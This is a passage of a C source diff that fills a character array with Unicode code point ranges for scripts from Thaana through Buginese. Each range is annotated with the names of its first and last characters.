+// 0780..07BF; Thaana
+	c = 0x780;		// from THAANA LETTER HAA
+	while (c <= 0x7b1)	// ..to THAANA LETTER NAA
+		charset[i++] = c++;
+// 07C0..07FF; NKo
+	c = 0x7c0;		// from NKO DIGIT ZERO
+	while (c <= 0x7fa)	// ..to NKO LAJANYALAN
+		charset[i++] = c++;
+	charset[i++] = 0x7fd;	// NKO DANTAYALAN
+	charset[i++] = 0x7ff;	// NKO TAMAN SIGN
+// 0800..083F; Samaritan
+	c = 0x800;		// from SAMARITAN LETTER ALAF
+	while (c <= 0x82d)	// ..to SAMARITAN MARK NEQUDAA
+		charset[i++] = c++;
+	c = 0x830;		// from SAMARITAN PUNCTUATION NEQUDAA
+	while (c <= 0x83e)	// ..to SAMARITAN PUNCTUATION ANNAAU
+		charset[i++] = c++;
+// 0840..085F; Mandaic
+	c = 0x840;		// from MANDAIC LETTER HALQA
+	while (c <= 0x85b)	// ..to MANDAIC GEMINATION MARK
+		charset[i++] = c++;
+	charset[i++] = 0x85e;	// MANDAIC PUNCTUATION
+// 0860..086F; Syriac Supplement
+	c = 0x860;		// from SYRIAC LETTER MALAYALAM NGA
+	while (c <= 0x86a)	// ..to SYRIAC LETTER MALAYALAM SSA
+		charset[i++] = c++;
+// 08A0..08FF; Arabic Extended-A
+	c = 0x8a0;		// from ARABIC LETTER BEH WITH SMALL V BELOW
+	while (c <= 0x8b4)	// ..to ARABIC LETTER KAF WITH DOT BELOW
+		charset[i++] = c++;
+	c = 0x8b6;		// from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
+	while (c <= 0x8bd)	// ..to ARABIC LETTER AFRICAN NOON
+		charset[i++] = c++;
+	c = 0x8d3;		// from ARABIC SMALL LOW WAW
+	while (c <= 0x8ff)	// ..to ARABIC MARK SIDEWAYS NOON GHUNNA
+		charset[i++] = c++;
+// 0900..097F; Devanagari
+	c = 0x900;		// from DEVANAGARI SIGN INVERTED CANDRABINDU
+	while (c <= 0x97f)	// ..to DEVANAGARI LETTER BBA
+		charset[i++] = c++;
+// 0980..09FF; Bengali
+	c = 0x980;		// from BENGALI ANJI
+	while (c <= 0x983)	// ..to BENGALI SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x985;		// from BENGALI LETTER A
+	while (c <= 0x98c)	// ..to BENGALI LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x98f;	// BENGALI LETTER E
+	charset[i++] = 0x990;	// BENGALI LETTER AI
+	c = 0x993;		// from BENGALI LETTER O
+	while (c <= 0x9a8)	// ..to BENGALI LETTER NA
+		charset[i++] = c++;
+	c = 0x9aa;		// from BENGALI LETTER PA
+	while (c <= 0x9b0)	// ..to BENGALI LETTER RA
+		charset[i++] = c++;
+	c = 0x9b6;		// from BENGALI LETTER SHA
+	while (c <= 0x9b9)	// ..to BENGALI LETTER HA
+		charset[i++] = c++;
+	c = 0x9bc;		// from BENGALI SIGN NUKTA
+	while (c <= 0x9c4)	// ..to BENGALI VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x9c7;	// BENGALI VOWEL SIGN E
+	charset[i++] = 0x9c8;	// BENGALI VOWEL SIGN AI
+	c = 0x9cb;		// from BENGALI VOWEL SIGN O
+	while (c <= 0x9ce)	// ..to BENGALI LETTER KHANDA TA
+		charset[i++] = c++;
+	charset[i++] = 0x9dc;	// BENGALI LETTER RRA
+	charset[i++] = 0x9dd;	// BENGALI LETTER RHA
+	c = 0x9df;		// from BENGALI LETTER YYA
+	while (c <= 0x9e3)	// ..to BENGALI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x9e6;		// from BENGALI DIGIT ZERO
+	while (c <= 0x9fe)	// ..to BENGALI SANDHI MARK
+		charset[i++] = c++;
+// 0A00..0A7F; Gurmukhi
+	charset[i++] = 0xa01;	// GURMUKHI SIGN ADAK BINDI
+	charset[i++] = 0xa03;	// GURMUKHI SIGN VISARGA
+	c = 0xa05;		// from GURMUKHI LETTER A
+	while (c <= 0xa0a)	// ..to GURMUKHI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xa0f;	// GURMUKHI LETTER EE
+	charset[i++] = 0xa10;	// GURMUKHI LETTER AI
+	c = 0xa13;		// from GURMUKHI LETTER OO
+	while (c <= 0xa28)	// ..to GURMUKHI LETTER NA
+		charset[i++] = c++;
+	c = 0xa2a;		// from GURMUKHI LETTER PA
+	while (c <= 0xa30)	// ..to GURMUKHI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xa32;	// GURMUKHI LETTER LA
+	charset[i++] = 0xa33;	// GURMUKHI LETTER LLA
+	charset[i++] = 0xa35;	// GURMUKHI LETTER VA
+	charset[i++] = 0xa36;	// GURMUKHI LETTER SHA
+	charset[i++] = 0xa38;	// GURMUKHI LETTER SA
+	charset[i++] = 0xa39;	// GURMUKHI LETTER HA
+	c = 0xa3e;		// from GURMUKHI VOWEL SIGN AA
+	while (c <= 0xa42)	// ..to GURMUKHI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xa47;	// GURMUKHI VOWEL SIGN EE
+	charset[i++] = 0xa48;	// GURMUKHI VOWEL SIGN AI
+	charset[i++] = 0xa4b;	// GURMUKHI VOWEL SIGN OO
+	charset[i++] = 0xa4d;	// GURMUKHI SIGN VIRAMA
+	c = 0xa59;		// from GURMUKHI LETTER KHHA
+	while (c <= 0xa5c)	// ..to GURMUKHI LETTER RRA
+		charset[i++] = c++;
+	c = 0xa66;		// from GURMUKHI DIGIT ZERO
+	while (c <= 0xa76)	// ..to GURMUKHI ABBREVIATION SIGN
+		charset[i++] = c++;
+// 0A80..0AFF; Gujarati
+	charset[i++] = 0xa81;	// GUJARATI SIGN CANDRABINDU
+	charset[i++] = 0xa83;	// GUJARATI SIGN VISARGA
+	c = 0xa85;		// from GUJARATI LETTER A
+	while (c <= 0xa8d)	// ..to GUJARATI VOWEL CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xa8f;	// GUJARATI LETTER E
+	charset[i++] = 0xa91;	// GUJARATI VOWEL CANDRA O
+	c = 0xa93;		// from GUJARATI LETTER O
+	while (c <= 0xaa8)	// ..to GUJARATI LETTER NA
+		charset[i++] = c++;
+	c = 0xaaa;		// from GUJARATI LETTER PA
+	while (c <= 0xab0)	// ..to GUJARATI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xab2;	// GUJARATI LETTER LA
+	charset[i++] = 0xab3;	// GUJARATI LETTER LLA
+	c = 0xab5;		// from GUJARATI LETTER VA
+	while (c <= 0xab9)	// ..to GUJARATI LETTER HA
+		charset[i++] = c++;
+	c = 0xabc;		// from GUJARATI SIGN NUKTA
+	while (c <= 0xac5)	// ..to GUJARATI VOWEL SIGN CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xac7;	// GUJARATI VOWEL SIGN E
+	charset[i++] = 0xac9;	// GUJARATI VOWEL SIGN CANDRA O
+	charset[i++] = 0xacb;	// GUJARATI VOWEL SIGN O
+	charset[i++] = 0xacd;	// GUJARATI SIGN VIRAMA
+	c = 0xae0;		// from GUJARATI LETTER VOCALIC RR
+	while (c <= 0xae3)	// ..to GUJARATI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xae6;		// from GUJARATI DIGIT ZERO
+	while (c <= 0xaf1)	// ..to GUJARATI RUPEE SIGN
+		charset[i++] = c++;
+	c = 0xaf9;		// from GUJARATI LETTER ZHA
+	while (c <= 0xaff)	// ..to GUJARATI SIGN TWO-CIRCLE NUKTA ABOVE
+		charset[i++] = c++;
+// 0B00..0B7F; Oriya
+	charset[i++] = 0xb01;	// ORIYA SIGN CANDRABINDU
+	charset[i++] = 0xb03;	// ORIYA SIGN VISARGA
+	c = 0xb05;		// from ORIYA LETTER A
+	while (c <= 0xb0c)	// ..to ORIYA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xb0f;	// ORIYA LETTER E
+	charset[i++] = 0xb10;	// ORIYA LETTER AI
+	c = 0xb13;		// from ORIYA LETTER O
+	while (c <= 0xb28)	// ..to ORIYA LETTER NA
+		charset[i++] = c++;
+	c = 0xb2a;		// from ORIYA LETTER PA
+	while (c <= 0xb30)	// ..to ORIYA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xb32;	// ORIYA LETTER LA
+	charset[i++] = 0xb33;	// ORIYA LETTER LLA
+	c = 0xb35;		// from ORIYA LETTER VA
+	while (c <= 0xb39)	// ..to ORIYA LETTER HA
+		charset[i++] = c++;
+	c = 0xb3c;		// from ORIYA SIGN NUKTA
+	while (c <= 0xb44)	// ..to ORIYA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xb47;	// ORIYA VOWEL SIGN E
+	charset[i++] = 0xb48;	// ORIYA VOWEL SIGN AI
+	charset[i++] = 0xb4b;	// ORIYA VOWEL SIGN O
+	charset[i++] = 0xb4d;	// ORIYA SIGN VIRAMA
+	charset[i++] = 0xb56;	// ORIYA AI LENGTH MARK
+	charset[i++] = 0xb57;	// ORIYA AU LENGTH MARK
+	charset[i++] = 0xb5c;	// ORIYA LETTER RRA
+	charset[i++] = 0xb5d;	// ORIYA LETTER RHA
+	c = 0xb5f;		// from ORIYA LETTER YYA
+	while (c <= 0xb63)	// ..to ORIYA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xb66;		// from ORIYA DIGIT ZERO
+	while (c <= 0xb77)	// ..to ORIYA FRACTION THREE SIXTEENTHS
+		charset[i++] = c++;
+// 0B80..0BFF; Tamil
+	charset[i++] = 0xb82;	// TAMIL SIGN ANUSVARA
+	charset[i++] = 0xb83;	// TAMIL SIGN VISARGA
+	c = 0xb85;		// from TAMIL LETTER A
+	while (c <= 0xb8a)	// ..to TAMIL LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xb8e;	// TAMIL LETTER E
+	charset[i++] = 0xb90;	// TAMIL LETTER AI
+	c = 0xb92;		// from TAMIL LETTER O
+	while (c <= 0xb95)	// ..to TAMIL LETTER KA
+		charset[i++] = c++;
+	charset[i++] = 0xb99;	// TAMIL LETTER NGA
+	charset[i++] = 0xb9a;	// TAMIL LETTER CA
+	charset[i++] = 0xb9e;	// TAMIL LETTER NYA
+	charset[i++] = 0xb9f;	// TAMIL LETTER TTA
+	charset[i++] = 0xba3;	// TAMIL LETTER NNA
+	charset[i++] = 0xba4;	// TAMIL LETTER TA
+	charset[i++] = 0xba8;	// TAMIL LETTER NA
+	charset[i++] = 0xbaa;	// TAMIL LETTER PA
+	c = 0xbae;		// from TAMIL LETTER MA
+	while (c <= 0xbb9)	// ..to TAMIL LETTER HA
+		charset[i++] = c++;
+	c = 0xbbe;		// from TAMIL VOWEL SIGN AA
+	while (c <= 0xbc2)	// ..to TAMIL VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xbc6;	// TAMIL VOWEL SIGN E
+	charset[i++] = 0xbc8;	// TAMIL VOWEL SIGN AI
+	c = 0xbca;		// from TAMIL VOWEL SIGN O
+	while (c <= 0xbcd)	// ..to TAMIL SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0xbe6;		// from TAMIL DIGIT ZERO
+	while (c <= 0xbfa)	// ..to TAMIL NUMBER SIGN
+		charset[i++] = c++;
+// 0C00..0C7F; Telugu
+	c = 0xc00;		// from TELUGU SIGN COMBINING CANDRABINDU ABOVE
+	while (c <= 0xc0c)	// ..to TELUGU LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc0e;	// TELUGU LETTER E
+	charset[i++] = 0xc10;	// TELUGU LETTER AI
+	c = 0xc12;		// from TELUGU LETTER O
+	while (c <= 0xc28)	// ..to TELUGU LETTER NA
+		charset[i++] = c++;
+	c = 0xc2a;		// from TELUGU LETTER PA
+	while (c <= 0xc39)	// ..to TELUGU LETTER HA
+		charset[i++] = c++;
+	c = 0xc3d;		// from TELUGU SIGN AVAGRAHA
+	while (c <= 0xc44)	// ..to TELUGU VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xc46;	// TELUGU VOWEL SIGN E
+	charset[i++] = 0xc48;	// TELUGU VOWEL SIGN AI
+	c = 0xc4a;		// from TELUGU VOWEL SIGN O
+	while (c <= 0xc4d)	// ..to TELUGU SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xc55;	// TELUGU LENGTH MARK
+	charset[i++] = 0xc56;	// TELUGU AI LENGTH MARK
+	charset[i++] = 0xc58;	// TELUGU LETTER TSA
+	charset[i++] = 0xc5a;	// TELUGU LETTER RRRA
+	c = 0xc60;		// from TELUGU LETTER VOCALIC RR
+	while (c <= 0xc63)	// ..to TELUGU VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xc66;		// from TELUGU DIGIT ZERO
+	while (c <= 0xc6f)	// ..to TELUGU DIGIT NINE
+		charset[i++] = c++;
+	c = 0xc78;		// from TELUGU FRACTION DIGIT ZERO FOR ODD POWERS OF FOUR
+	while (c <= 0xc7f)	// ..to TELUGU SIGN TUUMU
+		charset[i++] = c++;
+// 0C80..0CFF; Kannada
+	c = 0xc80;		// from KANNADA SIGN SPACING CANDRABINDU
+	while (c <= 0xc8c)	// ..to KANNADA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc8e;	// KANNADA LETTER E
+	charset[i++] = 0xc90;	// KANNADA LETTER AI
+	c = 0xc92;		// from KANNADA LETTER O
+	while (c <= 0xca8)	// ..to KANNADA LETTER NA
+		charset[i++] = c++;
+	c = 0xcaa;		// from KANNADA LETTER PA
+	while (c <= 0xcb3)	// ..to KANNADA LETTER LLA
+		charset[i++] = c++;
+	c = 0xcb5;		// from KANNADA LETTER VA
+	while (c <= 0xcb9)	// ..to KANNADA LETTER HA
+		charset[i++] = c++;
+	c = 0xcbc;		// from KANNADA SIGN NUKTA
+	while (c <= 0xcc4)	// ..to KANNADA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xcc6;	// KANNADA VOWEL SIGN E
+	charset[i++] = 0xcc8;	// KANNADA VOWEL SIGN AI
+	c = 0xcca;		// from KANNADA VOWEL SIGN O
+	while (c <= 0xccd)	// ..to KANNADA SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xcd5;	// KANNADA LENGTH MARK
+	charset[i++] = 0xcd6;	// KANNADA AI LENGTH MARK
+	c = 0xce0;		// from KANNADA LETTER VOCALIC RR
+	while (c <= 0xce3)	// ..to KANNADA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xce6;		// from KANNADA DIGIT ZERO
+	while (c <= 0xcef)	// ..to KANNADA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xcf1;	// KANNADA SIGN JIHVAMULIYA
+	charset[i++] = 0xcf2;	// KANNADA SIGN UPADHMANIYA
+// 0D00..0D7F; Malayalam
+	c = 0xd00;		// from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0xd03)	// ..to MALAYALAM SIGN VISARGA
+		charset[i++] = c++;
+	c = 0xd05;		// from MALAYALAM LETTER A
+	while (c <= 0xd0c)	// ..to MALAYALAM LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xd0e;	// MALAYALAM LETTER E
+	charset[i++] = 0xd10;	// MALAYALAM LETTER AI
+	c = 0xd12;		// from MALAYALAM LETTER O
+	while (c <= 0xd44)	// ..to MALAYALAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xd46;	// MALAYALAM VOWEL SIGN E
+	charset[i++] = 0xd48;	// MALAYALAM VOWEL SIGN AI
+	c = 0xd4a;		// from MALAYALAM VOWEL SIGN O
+	while (c <= 0xd4f)	// ..to MALAYALAM SIGN PARA
+		charset[i++] = c++;
+	c = 0xd54;		// from MALAYALAM LETTER CHILLU M
+	while (c <= 0xd63)	// ..to MALAYALAM VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xd66;		// from MALAYALAM DIGIT ZERO
+	while (c <= 0xd7f)	// ..to MALAYALAM LETTER CHILLU K
+		charset[i++] = c++;
+// 0D80..0DFF; Sinhala
+	charset[i++] = 0xd82;	// SINHALA SIGN ANUSVARAYA
+	charset[i++] = 0xd83;	// SINHALA SIGN VISARGAYA
+	c = 0xd85;		// from SINHALA LETTER AYANNA
+	while (c <= 0xd96)	// ..to SINHALA LETTER AUYANNA
+		charset[i++] = c++;
+	c = 0xd9a;		// from SINHALA LETTER ALPAPRAANA KAYANNA
+	while (c <= 0xdb1)	// ..to SINHALA LETTER DANTAJA NAYANNA
+		charset[i++] = c++;
+	c = 0xdb3;		// from SINHALA LETTER SANYAKA DAYANNA
+	while (c <= 0xdbb)	// ..to SINHALA LETTER RAYANNA
+		charset[i++] = c++;
+	c = 0xdc0;		// from SINHALA LETTER VAYANNA
+	while (c <= 0xdc6)	// ..to SINHALA LETTER FAYANNA
+		charset[i++] = c++;
+	c = 0xdcf;		// from SINHALA VOWEL SIGN AELA-PILLA
+	while (c <= 0xdd4)	// ..to SINHALA VOWEL SIGN KETTI PAA-PILLA
+		charset[i++] = c++;
+	c = 0xdd8;		// from SINHALA VOWEL SIGN GAETTA-PILLA
+	while (c <= 0xddf)	// ..to SINHALA VOWEL SIGN GAYANUKITTA
+		charset[i++] = c++;
+	c = 0xde6;		// from SINHALA LITH DIGIT ZERO
+	while (c <= 0xdef)	// ..to SINHALA LITH DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xdf2;	// SINHALA VOWEL SIGN DIGA GAETTA-PILLA
+	charset[i++] = 0xdf4;	// SINHALA PUNCTUATION KUNDDALIYA
+// 0E00..0E7F; Thai
+	c = 0xe01;		// from THAI CHARACTER KO KAI
+	while (c <= 0xe3a)	// ..to THAI CHARACTER PHINTHU
+		charset[i++] = c++;
+	c = 0xe3f;		// from THAI CURRENCY SYMBOL BAHT
+	while (c <= 0xe5b)	// ..to THAI CHARACTER KHOMUT
+		charset[i++] = c++;
+// 0E80..0EFF; Lao
+	charset[i++] = 0xe81;	// LAO LETTER KO
+	charset[i++] = 0xe82;	// LAO LETTER KHO SUNG
+	charset[i++] = 0xe87;	// LAO LETTER NGO
+	charset[i++] = 0xe88;	// LAO LETTER CO
+	c = 0xe94;		// from LAO LETTER DO
+	while (c <= 0xe97)	// ..to LAO LETTER THO TAM
+		charset[i++] = c++;
+	c = 0xe99;		// from LAO LETTER NO
+	while (c <= 0xe9f)	// ..to LAO LETTER FO SUNG
+		charset[i++] = c++;
+	charset[i++] = 0xea1;	// LAO LETTER MO
+	charset[i++] = 0xea3;	// LAO LETTER LO LING
+	charset[i++] = 0xeaa;	// LAO LETTER SO SUNG
+	charset[i++] = 0xeab;	// LAO LETTER HO SUNG
+	c = 0xead;		// from LAO LETTER O
+	while (c <= 0xeb9)	// ..to LAO VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xebb;	// LAO VOWEL SIGN MAI KON
+	charset[i++] = 0xebd;	// LAO SEMIVOWEL SIGN NYO
+	c = 0xec0;		// from LAO VOWEL SIGN E
+	while (c <= 0xec4)	// ..to LAO VOWEL SIGN AI
+		charset[i++] = c++;
+	c = 0xec8;		// from LAO TONE MAI EK
+	while (c <= 0xecd)	// ..to LAO NIGGAHITA
+		charset[i++] = c++;
+	c = 0xed0;		// from LAO DIGIT ZERO
+	while (c <= 0xed9)	// ..to LAO DIGIT NINE
+		charset[i++] = c++;
+	c = 0xedc;		// from LAO HO NO
+	while (c <= 0xedf)	// ..to LAO LETTER KHMU NYO
+		charset[i++] = c++;
+// 0F00..0FFF; Tibetan
+	c = 0xf00;		// from TIBETAN SYLLABLE OM
+	while (c <= 0xf47)	// ..to TIBETAN LETTER JA
+		charset[i++] = c++;
+	c = 0xf49;		// from TIBETAN LETTER NYA
+	while (c <= 0xf6c)	// ..to TIBETAN LETTER RRA
+		charset[i++] = c++;
+	c = 0xf71;		// from TIBETAN VOWEL SIGN AA
+	while (c <= 0xf97)	// ..to TIBETAN SUBJOINED LETTER JA
+		charset[i++] = c++;
+	c = 0xf99;		// from TIBETAN SUBJOINED LETTER NYA
+	while (c <= 0xfbc)	// ..to TIBETAN SUBJOINED LETTER FIXED-FORM RA
+		charset[i++] = c++;
+	c = 0xfbe;		// from TIBETAN KU RU KHA
+	while (c <= 0xfcc)	// ..to TIBETAN SYMBOL NOR BU BZHI -KHYIL
+		charset[i++] = c++;
+	c = 0xfce;		// from TIBETAN SIGN RDEL NAG RDEL DKAR
+	while (c <= 0xfda)	// ..to TIBETAN MARK TRAILING MCHAN RTAGS
+		charset[i++] = c++;
+// 1000..109F; Myanmar
+	c = 0x1000;		// from MYANMAR LETTER KA
+	while (c <= 0x109f)	// ..to MYANMAR SYMBOL SHAN EXCLAMATION
+		charset[i++] = c++;
+// 10A0..10FF; Georgian
+	c = 0x10a0;		// from GEORGIAN CAPITAL LETTER AN
+	while (c <= 0x10c5)	// ..to GEORGIAN CAPITAL LETTER HOE
+		charset[i++] = c++;
+	c = 0x10d0;		// from GEORGIAN LETTER AN
+	while (c <= 0x10ff)	// ..to GEORGIAN LETTER LABIAL SIGN
+		charset[i++] = c++;
+// 1100..11FF; Hangul Jamo
+	c = 0x1100;		// from HANGUL CHOSEONG KIYEOK
+	while (c <= 0x11ff)	// ..to HANGUL JONGSEONG SSANGNIEUN
+		charset[i++] = c++;
+// 1200..137F; Ethiopic
+	c = 0x1200;		// from ETHIOPIC SYLLABLE HA
+	while (c <= 0x1248)	// ..to ETHIOPIC SYLLABLE QWA
+		charset[i++] = c++;
+	c = 0x124a;		// from ETHIOPIC SYLLABLE QWI
+	while (c <= 0x124d)	// ..to ETHIOPIC SYLLABLE QWE
+		charset[i++] = c++;
+	c = 0x1250;		// from ETHIOPIC SYLLABLE QHA
+	while (c <= 0x1256)	// ..to ETHIOPIC SYLLABLE QHO
+		charset[i++] = c++;
+	c = 0x125a;		// from ETHIOPIC SYLLABLE QHWI
+	while (c <= 0x125d)	// ..to ETHIOPIC SYLLABLE QHWE
+		charset[i++] = c++;
+	c = 0x1260;		// from ETHIOPIC SYLLABLE BA
+	while (c <= 0x1288)	// ..to ETHIOPIC SYLLABLE XWA
+		charset[i++] = c++;
+	c = 0x128a;		// from ETHIOPIC SYLLABLE XWI
+	while (c <= 0x128d)	// ..to ETHIOPIC SYLLABLE XWE
+		charset[i++] = c++;
+	c = 0x1290;		// from ETHIOPIC SYLLABLE NA
+	while (c <= 0x12b0)	// ..to ETHIOPIC SYLLABLE KWA
+		charset[i++] = c++;
+	c = 0x12b2;		// from ETHIOPIC SYLLABLE KWI
+	while (c <= 0x12b5)	// ..to ETHIOPIC SYLLABLE KWE
+		charset[i++] = c++;
+	c = 0x12b8;		// from ETHIOPIC SYLLABLE KXA
+	while (c <= 0x12be)	// ..to ETHIOPIC SYLLABLE KXO
+		charset[i++] = c++;
+	c = 0x12c2;		// from ETHIOPIC SYLLABLE KXWI
+	while (c <= 0x12c5)	// ..to ETHIOPIC SYLLABLE KXWE
+		charset[i++] = c++;
+	c = 0x12c8;		// from ETHIOPIC SYLLABLE WA
+	while (c <= 0x12d6)	// ..to ETHIOPIC SYLLABLE PHARYNGEAL O
+		charset[i++] = c++;
+	c = 0x12d8;		// from ETHIOPIC SYLLABLE ZA
+	while (c <= 0x1310)	// ..to ETHIOPIC SYLLABLE GWA
+		charset[i++] = c++;
+	c = 0x1312;		// from ETHIOPIC SYLLABLE GWI
+	while (c <= 0x1315)	// ..to ETHIOPIC SYLLABLE GWE
+		charset[i++] = c++;
+	c = 0x1318;		// from ETHIOPIC SYLLABLE GGA
+	while (c <= 0x135a)	// ..to ETHIOPIC SYLLABLE FYA
+		charset[i++] = c++;
+	c = 0x135d;		// from ETHIOPIC COMBINING GEMINATION AND VOWEL LENGTH MARK
+	while (c <= 0x137c)	// ..to ETHIOPIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 1380..139F; Ethiopic Supplement
+	c = 0x1380;		// from ETHIOPIC SYLLABLE SEBATBEIT MWA
+	while (c <= 0x1399)	// ..to ETHIOPIC TONAL MARK KURT
+		charset[i++] = c++;
+// 13A0..13FF; Cherokee
+	c = 0x13a0;		// from CHEROKEE LETTER A
+	while (c <= 0x13f5)	// ..to CHEROKEE LETTER MV
+		charset[i++] = c++;
+	c = 0x13f8;		// from CHEROKEE SMALL LETTER YE
+	while (c <= 0x13fd)	// ..to CHEROKEE SMALL LETTER MV
+		charset[i++] = c++;
+// 1400..167F; Unified Canadian Aboriginal Syllabics
+	c = 0x1400;		// from CANADIAN SYLLABICS HYPHEN
+	while (c <= 0x167f)	// ..to CANADIAN SYLLABICS BLACKFOOT W
+		charset[i++] = c++;
+// 1680..169F; Ogham
+	c = 0x1680;		// from OGHAM SPACE MARK
+	while (c <= 0x169c)	// ..to OGHAM REVERSED FEATHER MARK
+		charset[i++] = c++;
+// 16A0..16FF; Runic
+	c = 0x16a0;		// from RUNIC LETTER FEHU FEOH FE F
+	while (c <= 0x16f8)	// ..to RUNIC LETTER FRANKS CASKET AESC
+		charset[i++] = c++;
+// 1700..171F; Tagalog
+	c = 0x1700;		// from TAGALOG LETTER A
+	while (c <= 0x170c)	// ..to TAGALOG LETTER YA
+		charset[i++] = c++;
+	c = 0x170e;		// from TAGALOG LETTER LA
+	while (c <= 0x1714)	// ..to TAGALOG SIGN VIRAMA
+		charset[i++] = c++;
+// 1720..173F; Hanunoo
+	c = 0x1720;		// from HANUNOO LETTER A
+	while (c <= 0x1736)	// ..to PHILIPPINE DOUBLE PUNCTUATION
+		charset[i++] = c++;
+// 1740..175F; Buhid
+	c = 0x1740;		// from BUHID LETTER A
+	while (c <= 0x1753)	// ..to BUHID VOWEL SIGN U
+		charset[i++] = c++;
+// 1760..177F; Tagbanwa
+	c = 0x1760;		// from TAGBANWA LETTER A
+	while (c <= 0x176c)	// ..to TAGBANWA LETTER YA
+		charset[i++] = c++;
+	charset[i++] = 0x176e;	// TAGBANWA LETTER LA
+	charset[i++] = 0x1770;	// TAGBANWA LETTER SA
+	charset[i++] = 0x1772;	// TAGBANWA VOWEL SIGN I
+	charset[i++] = 0x1773;	// TAGBANWA VOWEL SIGN U
+// 1780..17FF; Khmer
+	c = 0x1780;		// from KHMER LETTER KA
+	while (c <= 0x17dd)	// ..to KHMER SIGN ATTHACAN
+		charset[i++] = c++;
+	c = 0x17e0;		// from KHMER DIGIT ZERO
+	while (c <= 0x17e9)	// ..to KHMER DIGIT NINE
+		charset[i++] = c++;
+	c = 0x17f0;		// from KHMER SYMBOL LEK ATTAK SON
+	while (c <= 0x17f9)	// ..to KHMER SYMBOL LEK ATTAK PRAM-BUON
+		charset[i++] = c++;
+// 1800..18AF; Mongolian
+	c = 0x1800;		// from MONGOLIAN BIRGA
+	while (c <= 0x180e)	// ..to MONGOLIAN VOWEL SEPARATOR
+		charset[i++] = c++;
+	c = 0x1810;		// from MONGOLIAN DIGIT ZERO
+	while (c <= 0x1819)	// ..to MONGOLIAN DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1820;		// from MONGOLIAN LETTER A
+	while (c <= 0x1878)	// ..to MONGOLIAN LETTER CHA WITH TWO DOTS
+		charset[i++] = c++;
+	c = 0x1880;		// from MONGOLIAN LETTER ALI GALI ANUSVARA ONE
+	while (c <= 0x18aa)	// ..to MONGOLIAN LETTER MANCHU ALI GALI LHA
+		charset[i++] = c++;
+// 18B0..18FF; Unified Canadian Aboriginal Syllabics Extended
+	c = 0x18b0;		// from CANADIAN SYLLABICS OY
+	while (c <= 0x18f5)	// ..to CANADIAN SYLLABICS CARRIER DENTAL S
+		charset[i++] = c++;
+// 1900..194F; Limbu
+	c = 0x1900;		// from LIMBU VOWEL-CARRIER LETTER
+	while (c <= 0x191e)	// ..to LIMBU LETTER TRA
+		charset[i++] = c++;
+	c = 0x1920;		// from LIMBU VOWEL SIGN A
+	while (c <= 0x192b)	// ..to LIMBU SUBJOINED LETTER WA
+		charset[i++] = c++;
+	c = 0x1930;		// from LIMBU SMALL LETTER KA
+	while (c <= 0x193b)	// ..to LIMBU SIGN SA-I
+		charset[i++] = c++;
+	c = 0x1944;		// from LIMBU EXCLAMATION MARK
+	while (c <= 0x194f)	// ..to LIMBU DIGIT NINE
+		charset[i++] = c++;
+// 1950..197F; Tai Le
+	c = 0x1950;		// from TAI LE LETTER KA
+	while (c <= 0x196d)	// ..to TAI LE LETTER AI
+		charset[i++] = c++;
+	c = 0x1970;		// from TAI LE LETTER TONE-2
+	while (c <= 0x1974)	// ..to TAI LE LETTER TONE-6
+		charset[i++] = c++;
+// 1980..19DF; New Tai Lue
+	c = 0x1980;		// from NEW TAI LUE LETTER HIGH QA
+	while (c <= 0x19ab)	// ..to NEW TAI LUE LETTER LOW SUA
+		charset[i++] = c++;
+	c = 0x19b0;		// from NEW TAI LUE VOWEL SIGN VOWEL SHORTENER
+	while (c <= 0x19c9)	// ..to NEW TAI LUE TONE MARK-2
+		charset[i++] = c++;
+	c = 0x19d0;		// from NEW TAI LUE DIGIT ZERO
+	while (c <= 0x19da)	// ..to NEW TAI LUE THAM DIGIT ONE
+		charset[i++] = c++;
+	charset[i++] = 0x19de;	// NEW TAI LUE SIGN LAE
+	charset[i++] = 0x19df;	// NEW TAI LUE SIGN LAEV
+// 19E0..19FF; Khmer Symbols
+	c = 0x19e0;		// from KHMER SYMBOL PATHAMASAT
+	while (c <= 0x19ff)	// ..to KHMER SYMBOL DAP-PRAM ROC
+		charset[i++] = c++;
+// 1A00..1A1F; Buginese
+	c = 0x1a00;		// from BUGINESE LETTER KA
+	while (c <= 0x1a1b)	// ..to BUGINESE VOWEL SIGN AE
+		charset[i++] = c++;
